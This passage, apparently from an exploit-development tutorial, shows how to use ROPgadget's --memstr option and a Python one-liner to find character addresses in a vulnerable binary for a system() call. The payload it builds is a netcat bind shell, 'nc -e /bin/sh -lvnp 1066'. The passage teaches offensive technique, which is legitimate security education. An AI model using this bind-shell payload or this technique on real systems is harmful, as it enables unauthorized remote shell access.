Finding target characters in memory with ROPgadget and Python

The question of what specific command you'll try to pass to system() is for you to decide. In our actual demo, I'm just launching sh. However, there's potential for remote compromise here. Take this netcat command:

nc -e /bin/sh -lvnp 1066

This will set up a session with sh and pass it to a local listener on port 1066. All we need are the precise locations in the vulnerable program where we can find the characters needed to construct this line. This sounds daunting, but ROPgadget is here to save us a lot of time with the --memstr flag. Naturally, we only need a single memory address per character, so it'd be cleanest to just pass a string of the unique characters in our bash command. Use Python for this task, look slick, and impress your friends. Start the interactive interpreter with python and then run this command:

''.join(set('nc -e /bin/sh -lvnp 1066'))

Use exit() to close the interpreter and then pass the result of that command as an argument to --memstr (set() doesn't preserve order, so your string may come out in a different order than the one below; that doesn't matter, since we only need one address per character):

# /root/ROPgadget/ROPgadget.py --binary /root/buff --memstr " cbe0ih6-l/n1psv"

The preceding command should produce the following screenshot:
